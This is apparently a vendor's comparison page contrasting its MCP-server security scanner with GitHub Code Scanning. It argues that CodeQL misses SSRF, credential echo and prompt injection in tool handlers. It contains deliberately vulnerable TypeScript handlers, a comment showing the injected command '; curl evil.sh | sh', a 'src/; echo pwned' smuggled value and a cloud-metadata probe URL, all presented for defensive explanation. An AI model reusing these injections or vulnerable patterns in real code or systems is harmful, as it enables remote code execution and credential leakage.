A GitHub Code Scanning alternative for MCP servers and Claude skills
GitHub Code Scanning is great at the job it was built for: run CodeQL's standard query pack against your repo on every push, surface findings in the Security tab and inline on PR diffs, and gate the merge on configured severity. For a traditional web service it's nearly free, well-integrated, and credible. For a Claude skill or MCP server, the standard pack misses the things that actually matter — because the taint sources and threat models that pack was tuned for don't match the MCP tool-handler surface. SkillAudit fills that gap with rules built specifically for server.tool(...) handlers, plus an LLM-assisted prompt-injection probe that no SAST tool runs.
TL;DR
GitHub Code Scanning runs CodeQL on your repo. CodeQL's standard pack models the OWASP-shaped web-app world: HTTP request parameters as taint sources, SQL drivers / shells / file IO as taint sinks. That model fires on classic controllers and request handlers; it doesn't fire on the MCP idiom — server.tool('fetch_url', async ({url}) => fetch(url)) — because the standard pack doesn't recognise tool arguments as a taint source in the same way it recognises req.query.x. Worse, prompt-injection susceptibility isn't a CodeQL category at all; the standard pack has no concept of "untrusted content flows into a tool response that the LLM will treat as instructions." SkillAudit reads every server.tool(...) / @app.tool handler with MCP-shaped rules — SSRF, command-exec, credential echo, permission scope — and runs an LLM-assisted prompt-injection red-team. Output: a single A–F grade and a public report card. We've graded 101 of the most-installed MCP servers this way. 50% shipped SSRF, 38% had credential-handling findings, 19% earned an A. Keep GitHub Code Scanning on your repo for the OWASP coverage; add SkillAudit for the MCP surface.
Why teams look for a GitHub Code Scanning alternative for Claude skills and MCP servers
GitHub Code Scanning isn't bad. It's free for public repos, the integration with the Security tab and PR review is well-designed, and CodeQL's standard pack is one of the most mature SAST query libraries in the world. Teams running Code Scanning on a backend service get genuine coverage — SQL injection, path traversal, deserialization, hardcoded secrets, dangerous regex, the well-trodden OWASP categories.
But buyers and MCP authors keep landing on three structural reasons CodeQL's standard pack underfires on MCP code:
- The taint sources are wrong. CodeQL's standard pack identifies taint sources by language and framework — `req.query` and `req.params` in Express, `request.GET` in Django, `HttpServletRequest` in Java servlets. The MCP idiom is `server.tool("name", schema, async (args) => ...)`; the `args` object is the source, but the standard pack doesn't know `@modelcontextprotocol/sdk`'s `server.tool` registration or FastMCP's `@app.tool` decorator are taint origins. As a result, an SSRF in a tool handler — the most common finding in our 101-repo corpus — is invisible to a stock CodeQL run. Could a security team write a custom CodeQL query that models `server.tool` as a source? In theory, yes. In practice, nobody has shipped a maintained, public MCP query pack for GHCS, authoring CodeQL is a specialised skill, and the result wouldn't include the prompt-injection probe at all.
- Prompt injection isn't a CodeQL category. CodeQL is taint analysis: known sources, known sinks, dataflow between them. Prompt-injection susceptibility is a different kind of property — it asks "given this handler, is there a path where untrusted content (a webpage the agent fetched, a Slack message it summarised, a GitHub issue it triaged) ends up in a tool response that the LLM will read back as part of its prompt context?" That's a question about the semantics of an LLM agent loop, not a graph traversal between tagged AST nodes. SkillAudit answers it by extracting each handler's body and asking Claude Haiku 4.5 to red-team it; CodeQL has no equivalent.
- No public per-repo grade. GHCS findings live in the repo owner's Security tab, behind GitHub auth. They're not buyer-readable. A team evaluating whether to install someone else's MCP can't view that team's GHCS results — there's no public surface. SkillAudit's report card is at a stable public URL; the grade is on the README badge; the install decision becomes a glance-able comparison.
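The source-modelling gap in the first reason can be made concrete with a minimal sketch. The `registerTool` helper below is a plain-function stand-in for `server.tool(...)`, not the real SDK API; the point is that both handlers carry the same untrusted-URL dataflow, and only the Express-shaped one matches a source the standard pack models.

```typescript
// Stand-in types only; registerTool is NOT the real @modelcontextprotocol/sdk API.
type ToolHandler = (args: { url: string }) => string;

// Express-shaped handler: req.query.url is a modelled taint source,
// so the standard CodeQL pack can trace it to a sink.
function expressHandler(req: { query: { url: string } }): string {
  return `would fetch ${req.query.url}`;
}

// MCP-shaped handler: the same untrusted URL arrives as a tool argument,
// which the stock pack does not tag as a source.
const tools = new Map<string, ToolHandler>();
function registerTool(name: string, handler: ToolHandler): void {
  tools.set(name, handler); // stand-in for server.tool(name, schema, handler)
}
registerTool("fetch_url", ({ url }) => `would fetch ${url}`);

console.log(expressHandler({ query: { url: "http://169.254.169.254/" } }));
console.log(tools.get("fetch_url")!({ url: "http://169.254.169.254/" }));
```

Same flow, different source shape: that difference alone decides whether the standard pack fires.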
Three buyer-side reasons we hear:
- You audit MCPs you don't own. A team installing Stripe's, Cloudflare's, or AWS's MCP server can't see those vendors' GHCS results. SkillAudit's public board includes them.
- The standard CodeQL pack didn't fire on your MCP, but you know there's an SSRF. The query just doesn't model `server.tool` arguments as a source. SkillAudit's rules do.
- Your team needs a prompt-injection signal. CodeQL has no concept of untrusted-content-as-instruction. SkillAudit treats it as a first-class axis.
How SkillAudit is different
SkillAudit is a static + LLM-assisted scanner built specifically for the MCP tool-handler surface. The rules know about the MCP idiom: every `server.tool` registration, every `@app.tool` decorator across the nine MCP language SDKs (typescript, python, ruby, kotlin, java, csharp, swift, rust, go), every handler body, every `fetch()` / `http.request()` / `urllib.urlopen()` call inside a handler. Then it runs the seven checks that compose into a single A–F grade:
- SSRF — does any tool handler call `fetch()` with an LLM-controlled URL?
- Command-exec — `shell=True`, `execSync`, `os.system`, `subprocess.Popen` with shell-interpreted strings inside a handler?
- Prompt injection — the LLM-assisted red-team that SAST can't run.
- Credential echo — `process.env.X` or `os.environ['X']` on a handler return path?
- Permission scope — does the OAuth scope / Linux capability / API permission requested match what the handlers actually need?
- Maintenance — last commit, open issues, advisory feed.
- Client compatibility — non-standard transports, protocol-version mismatches.
Output is a single A–F grade plus a public report card at a stable URL with file paths and finding counts. Run time: roughly 60 seconds. Adoption is paste-a-URL or a GitHub Action that gates the merge on minimum grade — the same merge-gate model GHCS already uses, just running our rule pack instead of the stock CodeQL pack.
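To make the command-exec axis concrete, here is the shape that check targets, sketched with Node's `child_process`. The `git log` wrapper is an invented example, not taken from any audited repo.

```typescript
import { execSync, execFileSync } from "node:child_process";

// Invented example of the command-exec shape: an LLM-chosen `path`
// is interpolated, unquoted, into a shell-interpreted string.
function buildLogCommand(path: string): string {
  return `git log --oneline -- ${path}`;
}

function gitLog(path: string): string {
  // VULNERABLE: a path like "; curl evil.sh | sh" becomes a second command.
  return execSync(buildLogCommand(path)).toString();
}

// Safer shape: pass argv as an array so no shell ever parses the input.
function gitLogSafe(path: string): string {
  return execFileSync("git", ["log", "--oneline", "--", path]).toString();
}

// The injected text survives intact into the shell-interpreted string:
console.log(buildLogCommand("src/; echo pwned"));
```

The vulnerable and safe variants differ by one call shape, which is exactly why a handler-aware pattern rule can separate them.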
Side by side
| | GitHub Code Scanning (CodeQL standard pack) | SkillAudit |
|---|---|---|
| Scanner type | SAST — CodeQL taint analysis with the standard query pack | SAST + LLM-assisted; pattern-based for MCP idioms |
| Threat model | OWASP Top 10 in traditional web/server code | LLM-mediated attacker via tool handlers — MCP-specific |
| What's modelled as a taint source | `req.query`, `req.params`, `HttpServletRequest`, `@RequestBody`, etc. | Tool arguments — every `server.tool` / `@app.tool` handler argument |
| SSRF in `fetch(args.url)` tool handlers | Stock pack misses — args aren't tagged as a source | Yes — first-class MCP rule |
| Command-exec in tool handlers | Catches some when `spawn(...)` is the shape it knows; misses MCP-shaped variants | Yes — handler-aware rule fires on `execSync`, `os.system`, `shell=True` |
| Prompt-injection susceptibility | Not a category — CodeQL doesn't model LLM-as-instruction-channel | Yes — Claude Haiku 4.5 red-teams every extracted handler |
| Credential echo from `process.env` | Catches some hardcoded-secret patterns; misses env-var-on-handler-return-path | First-class axis; flags env vars in handler return paths |
| Permission-scope review | Not in scope | Yes — flags org-wide OAuth scopes when single-repo would do |
| Maintenance / repo signals | Not in scope | Last commit, open issues, advisory feed; per-axis |
| Client compatibility | Not in scope | Yes — non-standard transports + protocol-version mismatches |
| Findings location | Repo Security tab + PR diff (GitHub-native) | Public per-repo report card at a stable URL |
| Buyer-side public grade | No — findings are private to the repo owner | Yes — public board; embeddable badge for authors |
| Custom MCP query pack | Possible in theory; nobody has shipped a maintained one | Built-in — the rule pack is the product |
| Pricing | Free for public repos; included in GitHub Advanced Security for private repos | Free: 3 audits/mo public · Pro $19/mo · Team $99/mo |
The shape of the gap, in 30 seconds
Here is the canonical SSRF in an MCP tool handler. CodeQL's standard pack does not fire on it — the taint source isn't modelled. SkillAudit fires on it because the rule knows what an MCP tool registration looks like:
```typescript
// Clean under GitHub Code Scanning (standard CodeQL pack — args
// not modelled as a taint source on server.tool registrations).
// F-grade SSRF under SkillAudit.
import { McpServer } from "@modelcontextprotocol/sdk/server/mcp.js";
import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js";
import { z } from "zod";

const server = new McpServer({ name: "fetch-helper", version: "1.0" });

server.tool(
  "fetch_url",
  "Fetch the contents of any URL",
  { url: z.string() },
  async ({ url }) => {
    const res = await fetch(url); // SSRF
    const body = await res.text();
    // and a credential echo on the same return path
    return {
      content: [{
        type: "text",
        text: `${body}\n[token: ${process.env.API_TOKEN}]`,
      }],
    };
  }
);

server.connect(new StdioServerTransport());
```
Two findings in eight lines: SSRF on fetch(url) with an LLM-controlled argument, and credential echo (process.env.API_TOKEN) reaching a tool response the LLM will quote back in its own output. Neither fires on a stock CodeQL run, because the standard pack's source/sink configuration was tuned for HTTP request handlers, not MCP tool registrations. Both are routine catches in our rule pack — the same rules that produce the public grades in our corpus. None of this is a knock on CodeQL's engine — it's the right engine, on the wrong query pack, for this code.
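For contrast, here is a hedged sketch of what a passing handler body could look like: pin the URL to a host allowlist before fetching, and keep `process.env` off the return path entirely. The allowed hosts are illustrative, not a SkillAudit requirement.

```typescript
// Illustrative hardening of the fetch_url handler: validate against an
// allowlist before fetching, and return only the fetched body.
const ALLOWED_HOSTS = new Set(["api.example.com", "docs.example.com"]);

function assertAllowedUrl(raw: string): URL {
  const url = new URL(raw); // throws on malformed input
  if (url.protocol !== "https:") {
    throw new Error(`blocked protocol: ${url.protocol}`);
  }
  if (!ALLOWED_HOSTS.has(url.hostname)) {
    throw new Error(`blocked host: ${url.hostname}`);
  }
  return url;
}

// Inside the tool handler, fetch only after validation, and return the
// body alone (no env secrets on the return path):
//   const res = await fetch(assertAllowedUrl(url));
//   return { content: [{ type: "text", text: await res.text() }] };
```

With this shape, the metadata-endpoint probe (`https://169.254.169.254/`) fails the allowlist check before any request is made.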
What the data says
We ran SkillAudit against 101 of the most-installed Claude skills and MCP servers — the full live board is public and growing. The corpus includes vendor-official releases (Stripe, PayPal, MongoDB, Redis, Cloudflare, AWS, Azure, GCP, Heroku, Notion, Snowflake, Pinecone, Couchbase, Auth0, Resend, Brave, Vectara, Meilisearch, plus Anthropic's nine official MCP language SDKs), popular indie frameworks (FastMCP, mcp-use, mcp-agent), and community releases.
Results: 50% (50/101) shipped SSRF findings, 38% (38/101) had credential-handling findings, 10% (10/101) had command-exec findings, only 19% (19/101) earned an A. Full grade distribution: 19 A · 30 C · 10 D · 42 F. Methodology and per-repo grades are in our research post: The state of MCP server security, 2026.
The relevant point for the GHCS comparison: most of the F-grade vendor-official repos in the corpus — Cloudflare's mcp-server-cloudflare, Heroku's heroku-mcp-server, Stripe's agent-toolkit, MongoDB's mongodb-mcp-server, the GitHub github-mcp-server itself — are GitHub-hosted, often with Code Scanning enabled, and the standard CodeQL pack is firing zero on the SSRF / credential-echo / prompt-injection findings SkillAudit reports. That's the model gap: CodeQL is doing what it does, it's just not tuned for the MCP idiom. SkillAudit is.
When GitHub Code Scanning is still right
GHCS earns its keep, even on the same repo. Specifically:
- Your MCP server wraps a traditional web service. If the repo also exposes a regular HTTP API, CodeQL's standard pack catches the OWASP-shaped issues in that surface — SQL injection in your `/users` endpoint, path traversal in your file-upload route. SkillAudit doesn't replace that; it covers the MCP wrapper, not the underlying app.
- You want GitHub-native PR comments. Code Scanning surfaces findings inline on the PR diff, which is genuinely better UX than checking an external dashboard. A team optimising for "the merge gate is the gate" should keep GHCS in the loop.
- You're a public-repo team and the price is "free." CodeQL on public repos is included; it's hard to argue against running it. SkillAudit is also free at small volume on public repos — the two stack.
- Hardcoded secrets and obvious deserialization patterns. CodeQL's standard pack is mature on those; if you're worried about a GPG key in source or an unsafe `pickle.loads`, GHCS catches it.
- You're already running Advanced Security. Don't rip it out. The Security tab is GitHub's native surface for code review at scale; SkillAudit doesn't compete with that workflow, it adds a public per-repo grade alongside it.
The most useful framing: GHCS is the SAST that runs on every push to catch the OWASP-shaped patterns CodeQL's standard pack knows about; SkillAudit is the SAST that runs on every push to catch the MCP-shaped patterns CodeQL's standard pack doesn't. Same engine class, different rule pack, different threat model. They don't conflict.
Workflow
Three steps to add SkillAudit on top of your existing Code Scanning setup:
- Keep Code Scanning on. The standard CodeQL pack is doing real work on the OWASP-shaped surface. Don't disable it.
- Add SkillAudit as a second job in CI. A separate workflow runs the SkillAudit GitHub Action on push (Pro plan) or on every plugin install (gated via `.claude/plugins.lock` changes). The two checks run in parallel; the merge gate fails if either fails.
- Pair the public grade with the private findings. GHCS findings stay in your Security tab; SkillAudit's grade goes on the public board and the README badge. A buyer evaluating whether to install your MCP can read the grade in five seconds; your security team can drill into both feeds: the Security tab and the SkillAudit report card.
Indie developers shipping MCP servers can run SkillAudit at zero cost — the free tier covers three audits a month on public repos, and the public report card is shareable on your README the same day you publish. Buyers gate adoption with the public grade; authors embed the badge to win listings.
Try SkillAudit on your repo — free
Paste any GitHub URL on the home page, get a graded report card in 60 seconds. Your repo joins the public board only if you opt in; private repos audit through a single-repo OAuth scope, never org-wide.